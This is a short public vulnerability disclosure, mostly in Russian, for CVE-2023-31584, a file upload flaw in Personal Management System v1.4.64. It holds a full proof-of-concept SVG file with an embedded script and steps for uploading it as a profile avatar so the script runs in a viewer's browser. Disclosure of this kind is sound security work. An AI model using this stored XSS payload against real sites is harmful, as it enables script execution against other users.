
Public disclosure for CVE-2023-31584.
Уязвимость произвольной загрузки файлов в Personal Management System v1.4.64 позволяет злоумышленникам выполнять произвольный код через загрузку специально созданного SVG-файла в аватар профиля пользователя.
[Дополнительная информация] 1.) Создайте alert.svg со следующим содержимым:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) Разместите .SVG на веб-сервере.
3.) Загрузите .SVG в качестве изображения аватара. 4.) Когда пользователь открывает аватар в отдельной вкладке, JavaScript, сохранённый в .SVG-файле, выполняется.
Ссылки: https://github.com/Volmarg/personal-management-system